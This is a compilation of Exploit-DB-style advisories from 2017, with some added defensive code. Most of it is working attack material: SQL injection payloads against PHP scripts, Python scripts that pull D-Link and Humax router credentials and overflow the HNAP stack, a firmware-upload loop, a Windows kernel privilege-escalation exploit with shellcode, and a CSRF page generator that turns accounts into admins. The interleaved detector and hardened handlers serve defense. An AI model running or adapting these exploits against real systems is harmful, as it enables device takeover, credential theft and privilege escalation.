# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-12
Product & Service Introduction:
===============================
XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.
Technical Details & Description:
================================
SQL injection on [view] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Consumer Review Script v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/product/consumer-review-script/
# Software Link: http://www.phpscriptsmall.com/product/consumer-review-script/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-12
Product & Service Introduction:
===============================
Consumer Review Script
Technical Details & Description:
================================
SQL injection on [idvalue] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/review-details.php?idvalue=9 and sleep(5)
Parameter: idvalue (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: idvalue=90 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(5020=5020,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: idvalue=90 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
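Added here as a defender-side example, not part of any advisory above: a small Python detector that undoes the obfuscation used by the payloads on this page (MySQL conditional comments such as /*!00002UNION*/, '+' and percent encoding, mixed case) and then flags the signature families seen in Ihsan Sencan's advisories (UNION/SELECT, FLOOR(RAND(0)*2) error-based, information_schema, USER()/DATABASE()/VERSION(), the 'or 1=1 login bypass) and in 8bitsec's sleep(5) probes. The access-log lines it scans are constructed, and the signature names and regexes are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of a "conditional comment" such as /*!00002UNION*/
# while naive keyword filters see only a comment: unwrap it and keep the body.
COND_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
# Ordinary /* ... */ comments are dropped entirely.
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)

# Signature families modelled on the payload shapes quoted in the advisories.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*?\bselect\b"),
    "tautology": re.compile(r"'\s*or\s+(\d+\s*=\s*\d+|''\s*=\s*')"),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "error_based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
    "fingerprint": re.compile(r"\b(user|database|version)\s*\(\s*\)"),
}

# Apache combined-log shape: client, [timestamp], "METHOD target HTTP/x", status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')


def normalize(raw):
    """Undo the encodings a payload hides behind before matching."""
    s = unquote_plus(raw)             # '+' and %XX exactly as the web server decodes them
    s = COND_COMMENT.sub(r" \1 ", s)  # /*!00002UNION*/ -> " UNION "
    s = PLAIN_COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def scan_value(raw):
    """Return the sorted signature names that match one parameter value."""
    s = normalize(raw)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(s))


def scan_log(text):
    """Scan every query-string parameter of every access-log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        for part in query.split("&"):
            key, _, value = part.partition("=")   # keep any later '=' inside the value
            hits = scan_value(value)
            if hits:
                findings.append({"client": client, "path": path, "param": key,
                                 "status": int(status), "hits": hits})
    return findings


# Constructed sample lines (not real traffic); the payload shapes mirror the
# advisories above: comment-wrapped UNION, a sleep(5) probe, and the
# FLOOR(RAND(0)*2) error-based form against information_schema.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2017:10:01:02 +0000] "GET /shop/products?id=-1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update HTTP/1.1" 200 5123
10.0.0.7 - - [14/Sep/2017:10:01:09 +0000] "GET /shop/products?id=42&action=update HTTP/1.1" 200 4811
10.0.0.9 - - [12/Sep/2017:11:20:33 +0000] "GET /review-details.php?idvalue=9%20and%20sleep(5) HTTP/1.1" 200 612
10.0.0.9 - - [12/Sep/2017:11:21:01 +0000] "GET /gpt.php?v=entry&type=%27++aND(/*!00000sELeCT*/+1+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/(dATABASE(),0x7e,fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+%27%27=%27&id=1 HTTP/1.1" 500 0
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['path']} param={f['param']} hits={','.join(f['hits'])}")
```

Only GET parameters are visible in an access log; the login-form bypass travels in a POST body, so that check has to run where the body is available (a WAF, a request filter, or the application itself), which is why scan_value is exposed separately.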
# phpcgi is responsible for processing requests to .php, .asp and .txt pages. It also checks whether a user is authorized. Nevertheless, if a request is crafted in the proper way, an attacker can easily bypass authorization and execute a script that returns the router's login and password.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py
import requests as rq
EQ = "%3d"
IP = "192.168.0.1"
PORT = "80"
def pair(key, value):
    return "%0a_POST_" + key + EQ + value
headers_multipart = {
'CONTENT-TYPE' : 'application/x-www-form-urlencoded'
}
url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT)
auth = "%0aAUTHORIZED_GROUP%3d1"
data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth
print(rq.get(url, data=data, headers=headers_multipart).text)
# Due to an error in the HNAP protocol implementation, we can overflow the stack and execute any sh commands with root privileges.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py
import requests as rq
import struct
IP = "192.168.0.1"
PORT = "80"
# Can differ between router models and firmware versions
# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01
SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07
def _str(address):
    return struct.pack("<I", address) if address > 0 else struct.pack("<i", address)
url = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)
headers_text = {
'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',
'CONTENT-TYPE' : 'text/html'
}
payload = b"echo 1 > /tmp/hacked;"
print(rq.post(url, data=b"<Action>" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"</Action>", headers=headers_text).text)
# coding: utf-8
# Exploit Title: Humax HG100R-* Authentication Bypass
# Date: 14/09/2017
# Exploit Author: Kivson
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-11435
# The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
# crafted requests to the management console. The bug is exploitable remotely when the router is configured to
# expose the management console.
# The router does not validate the session token when answering some methods of the '/api' URL.
# An attacker can use this vulnerability to retrieve sensitive information such
# as private/public IP addresses, SSID names, and passwords.
import sys
import requests
def print_help():
    print('Exploit syntax error, Example:')
    print('python exploit.py http://192.168.0.1')


def exploit(host):
    print(f'Connecting to {host}')
    path = '/api'
    # JSON-RPC call that the router answers without checking the session token
    payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
    response = requests.post(host + path, data=payload)
    response.raise_for_status()
    body = response.json()  # parse once instead of re-parsing on every access
    wifi = body.get('result', {}).get('WiFi_Info', {})
    if 'wlan' not in wifi:
        print('Error, target may be not exploitable')
        return
    for wlan in wifi['wlan']:
        print('Wifi data found:')
        print(f' SSID: {wlan["ssid"]}')
        print(f' PWD: {wlan["password"]}')


def main():
    if len(sys.argv) < 2:
        print_help()
        return
    host = sys.argv[1]
    exploit(host)


if __name__ == '__main__':
    main()
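The root cause above is that some /api methods answer without validating the session token. As an added example (not Humax's firmware code), the following deny-by-default JSON-RPC dispatcher treats every method as protected unless it is explicitly listed as public; the handler bodies, the PUBLIC_METHODS split and the -32001 error code are assumptions, and the request body is the one the exploit sends.

```python
import json

# Request body from the exploit above (the only input it sends).
PAYLOAD = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'


# Constructed stand-ins for the real handlers; the firmware's own code is unknown.
def quick_setup_info(session_token):
    return {"WiFi_Info": {"wlan": [{"ssid": "home", "password": "<redacted>"}]}}


def public_info(session_token):
    return {"model": "HG100R"}


# Assumed split: the only methods reachable without a session are listed here;
# everything else, including QuickSetupInfo, needs a valid token.
PUBLIC_METHODS = {"PublicInfo": public_info}
PROTECTED_METHODS = {"QuickSetupInfo": quick_setup_info}


def error(rid, code, message):
    return {"jsonrpc": "2.0", "id": rid, "error": {"code": code, "message": message}}


def handle_api(raw_body, valid_sessions, session_token=None):
    """Dispatch one JSON-RPC 2.0 call the way a fixed /api should: a method
    that is not explicitly public is refused before its handler runs unless
    the presented token is one the router issued."""
    try:
        req = json.loads(raw_body)
    except ValueError:
        return error(None, -32700, "Parse error")
    rid, method = req.get("id"), req.get("method")
    if method in PUBLIC_METHODS:
        handler = PUBLIC_METHODS[method]
    elif method in PROTECTED_METHODS:
        if session_token is None or session_token not in valid_sessions:
            return error(rid, -32001, "Unauthorized")  # assumed server-defined code
        handler = PROTECTED_METHODS[method]
    else:
        return error(rid, -32601, "Method not found")
    return {"jsonrpc": "2.0", "id": rid, "result": handler(session_token)}
```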
# # # # #
# Exploit Title: Contact Manager 1.0 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://savsofteproducts.com/
# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
# Demo: http://contactmanagerscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The forgot-password handler in login.php interpolates the femail request parameter directly into its SQL queries, allowing an attacker to inject SQL commands.
#
# Vulnerable Source:
#
# .............
# <a href="login.php?forgot=1">Forgot Password ?</a>
# <?php
# if(isset($_REQUEST["forgot"])){
# if($_REQUEST["forgot"]=="2"){
# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
# $count=mysql_num_rows($result);
# if($count==1)
#
# {
#
# $npass=rand("5556","99999");
#
# $to = $row['femail'];
# $subject = "Password Reset";
# $message = "New Primary Password is: $npass \r\n";
# $headers = "From: $Email";
#
# $npass=md5($npass);
#
# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
# mysql_query($query);
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
#
# Etc..
# # # # #
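Added hardened counterpart (Python with sqlite3, not the vendor's PHP) to the Contact Manager forgot-password handler quoted above: femail is bound as a query parameter instead of being interpolated into the SELECT and UPDATE, and the emailed reset secret is a high-entropy token stored as a salted PBKDF2 hash instead of md5(rand("5556","99999")). The co_setting table layout and the sample accounts are constructed.

```python
import hashlib
import secrets
import sqlite3

# Constructed schema mirroring the advisory's co_setting table (Email, Password).
SCHEMA = "CREATE TABLE co_setting (Email TEXT PRIMARY KEY, Password TEXT NOT NULL)"


def make_db(emails):
    """In-memory database with one constructed account per email."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO co_setting (Email, Password) VALUES (?, ?)",
                     [(e, "unset") for e in emails])
    conn.commit()
    return conn


def count_accounts(conn, femail):
    """Parameterised replacement for
    select * from co_setting where Email='$_REQUEST[femail]'.
    The placeholder binds femail as a value, never as SQL text."""
    row = conn.execute("SELECT COUNT(*) FROM co_setting WHERE Email = ?",
                       (femail,)).fetchone()
    return row[0]


def hash_password(secret, salt=None):
    """Salted PBKDF2-HMAC-SHA256 instead of an unsalted md5() of a 5-digit number."""
    salt = salt or secrets.token_hex(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode(), bytes.fromhex(salt), 200_000)
    return f"pbkdf2${salt}${digest.hex()}"


def verify_password(stored, candidate):
    _, salt, _ = stored.split("$")
    return secrets.compare_digest(stored, hash_password(candidate, salt))


def reset_password(conn, femail):
    """Forgot-password flow: returns the temporary secret to be mailed,
    or None when femail does not match exactly one account."""
    if count_accounts(conn, femail) != 1:
        return None
    temp = secrets.token_urlsafe(12)  # ~96 bits of entropy, not rand(5556, 99999)
    conn.execute("UPDATE co_setting SET Password = ? WHERE Email = ?",
                 (hash_password(temp), femail))
    conn.commit()
    return temp


def stored_hash(conn, femail):
    row = conn.execute("SELECT Password FROM co_setting WHERE Email = ?",
                       (femail,)).fetchone()
    return row[0] if row else None
```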
#!/bin/bash
# If you have access to an ethernet port you can upload custom firmware to the device, because the system recovery service is started and reachable for a few seconds after a restart.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh
FIRMWARE="firmware.bin"
IP="192.168.0.1"
while true; do
T=$(($RANDOM + ($RANDOM % 2) * 32768))
STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null`
if [[ $STATUS == *"<title>Provided by D-Link</title>"* ]]; then
echo "Uploading..."
curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm
break
elif [[ $STATUS == *"<title>D-LINK</title>"* ]]; then
echo "Rebooting..."
echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541
fi
done
// Netdecision.cpp : Defines the entry point for the console application.
/*
# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
# Date: 2017.09.17
# Exploit Author: Peter Baris
# Vendor Homepage: www.netmechanica.com
# Software Link: http://www.netmechanica.com/downloads/ //registration required
# Version: 5.8.2
# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
# CVE : CVE-2017-14311
Vendor notified on 2017.09.11 - no response */
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#include <tlhelp32.h>
#include <Psapi.h>
#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
extern ULONG ZwYieldExecution = NULL;
extern PVOID KernelBaseAddressInKernelMode = NULL;
extern HMODULE hKernelInUserMode = NULL;
VOID GetKiFastSystemCall() {
SIZE_T ReturnLength;
HMODULE hntdll = NULL;
ULONG ZwYieldExecution_offset;
hntdll = LoadLibraryA("ntdll.dll");
if (!hntdll) {
printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
KernelBaseAddressInKernelMode = drivers[0];
printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
if (!hKernelInUserMode) {
printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
ZwYieldExecution = (ULONG)GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
if (!ZwYieldExecution) {
printf("[-] Failed to resolve ZwYieldExecution: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
/* Relocate the user-mode offset onto the kernel-mode image base */
ZwYieldExecution = ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
if (hntdll) {
FreeLibrary(hntdll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hntdll = NULL;
}
extern ULONG eip = NULL;
extern ULONG pesp = NULL;
extern ULONG pebp = NULL;
extern ULONG ETHREAD = NULL;
ULONG Shellcode() {
ULONG FunctionAddress = ZwYieldExecution;
__asm {
pushad
pushfd
xor eax,eax
mov edi, FunctionAddress ; Address of ZwYieldExection to EDI
SearchCall:
mov eax, 0xe8
scasb
jnz SearchCall
mov ebx, edi
mov ecx, [edi]
add ebx, ecx; EBX points to KiSystemService
add ebx, 0x4
lea edi, [ebx - 0x1]
SearchFastCallEntry:
mov eax, 0x00000023
scasd
jnz SearchFastCallEntry
mov eax, 0xa10f306a
scasd
jnz SearchFastCallEntry
lea eax,[edi-0x9]
xor edx, edx
mov ecx, 0x176
wrmsr
popfd
popad
mov eax,ETHREAD
mov eax,[eax]
mov eax, [eax+0x050]
mov ecx, eax
mov edx, 0x4
FindSystemProcess :
mov eax, [eax + 0x0B8]
sub eax, 0x0B8
cmp[eax + 0x0B4], edx
jne FindSystemProcess
mov edx, [eax + 0x0F8]
mov[ecx + 0x0F8], edx
;xor eax, eax
mov esp,pesp
mov ebp,pebp
push eip
; int 3
ret
}
}
int main()
{
HANDLE hlib = NULL;
HANDLE hFile = NULL;
PVOID lpInBuffer = NULL;
PVOID lpOutBuffer = NULL;
ULONG lpBytesReturned;
PVOID BuffAddress = NULL;
SIZE_T BufferSize = 0x1000;
SIZE_T nOutBufferSize = 0x800;
ULONG Interval = 0;
ULONG Shell = (ULONG)&Shellcode;
NTSTATUS NtStatus = NULL;
/* Undocumented feature to trigger the vulnerability */
hlib = LoadLibraryA("ntdll.dll");
if (!hlib) {
printf("[-] Failed to load the library: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
GetKiFastSystemCall();
/* Allocate memory for our input and output buffers */
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
/* Crafting the input buffer */
BuffAddress = (PVOID)(((ULONG)lpInBuffer));
*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
*(PULONG)BuffAddress = (ULONG)0x00000000;
//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
return 1;
}
else
{
printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
}
/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
eip = (ULONG)GetModuleHandleA(NULL); /*Getting the base address of our process*/
printf("[+] Current process base address 0x%X\r\n", eip);
eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instruction*/
printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", eip);
/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
if (affinity == NULL) {
printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
exit(1);
}
ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
__asm {
mov pesp, esp
mov pebp, ebp
nop
}
DeviceIoControl(hFile,
0x9C402088,
lpInBuffer,
0x10,
lpOutBuffer,
0x20,
&lpBytesReturned,
NULL);
STARTUPINFO info = { sizeof(info) };
PROCESS_INFORMATION processInfo;
BOOL proc;
LPCTSTR command = TEXT("C:\\Windows\\System32\\cmd.exe"); /* TEXT() follows the project's character set, like DEVICE_NAME */
proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
if (!proc) {
printf("ERROR 0x%X\r\n", GetLastError());
}
WaitForSingleObject(processInfo.hProcess, INFINITE);
exit(0);
}
# # # # #
# Exploit Title: PTCEvolution 5.50 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://ptcevolution.com/
# Software Link: http://www.ptcevolution.com/demoo/
# Demo: http://demo.ptcevolution.com/
# Version: 5.50
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands via the id parameter of index.php.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?view=product&id=[SQL]
# http://localhost/[PATH]/index.php?view=products&id=[SQL]
#
# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
#
# Etc..
# # # # #
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/index.asp
# Demo: http://www.digiappz.com/room/index.asp
# Version: 3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
    e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digirez 3.4 - CSRF (Update Admin)
################################################################################
'''
    print e_baslik
    url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: "))
    id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ")
    # Self-submitting copy of the user_save.asp form; the target URL and user ID are filled in below
    csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user" >
<table align=center border=0>
<tr>
<td valign="middle">
<table align=center border=0>
<tr>
<td align=center bgcolor="white">
<table border=0 width=400 cellpadding=2 cellspacing=1>
<tr>
<td align=left colspan=2 bgcolor="cream">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td width=150>
<font>Choose Login*</font>
</td>
<td>
<INPUT type="text" name="login" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Choose Password*</font>
</td>
<td>
<INPUT type="text" name="password" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>First Name*</font>
</td>
<td>
<INPUT type="text" name="first_name" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Last Name*</font>
</td>
<td>
<INPUT type="text" name="last_name" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Email*</font>
</td>
<td>
<INPUT type="text" name="email" size="30" value="admin@admin.com" onBlur="emailvalid(this);">
</td>
</tr>
<tr>
<td>
<font>Address 1</font>
</td>
<td>
<INPUT type="text" name="address1" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Address 2</font>
</td>
<td>
<INPUT type="text" name="address2" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>City / Town</font>
</td>
<td>
<INPUT type="text" name="city" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>ZIP / Postcode</font>
</td>
<td>
<INPUT type="text" name="postcode" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>State / County</font>
</td>
<td>
<INPUT type="text" name="county" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Country</font>
</td>
<td>
<select name="country">
<option value="1" selected> Turkey</option>
</select>
</td>
</tr>
<tr>
<td>
<font>Phone Number</font>
</td>
<td>
<INPUT type="text" name="phone" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Fax</font>
</td>
<td>
<INPUT type="text" name="fax" size="30" value="admin">
</td>
</tr>
<tr>
<td>
<font>Status</font>
</td>
<td>
<select name="status">
<option value="1"> User</option>
<option value="2" selected> Admin</option>
</select>
</td>
</tr>
<tr>
<td colspan=2 align=center>
<input type="hidden" name="id" value="%s">
<input type="submit" value="Update" onclick="return check()">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
''' %(url, id)
    print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
    print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
    extension = ".html"
    name = raw_input(" Filename: ")
    filename = name+extension
    file = open(filename, "w")
    file.write(csrfhtmlcode)
    file.close()
    print(" [+] Your exploit is saved as %s" % filename)
    print("")
csrfexploit()
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The CGI version of the admin pages of the UTStar modem does not authenticate the user, so any protected page in the modem can be accessed directly by replacing the page extension with .cgi. This also allows anyone to perform operations such as resetting the modem, changing passwords and backing up the configuration without any authentication. The modem also discloses the passwords of each user (Admin, Support and User) in plain text in the page source.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and http://192.168.1.1/abcd.html is one of the admin-protected pages in the modem; then the page can be accessed directly as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel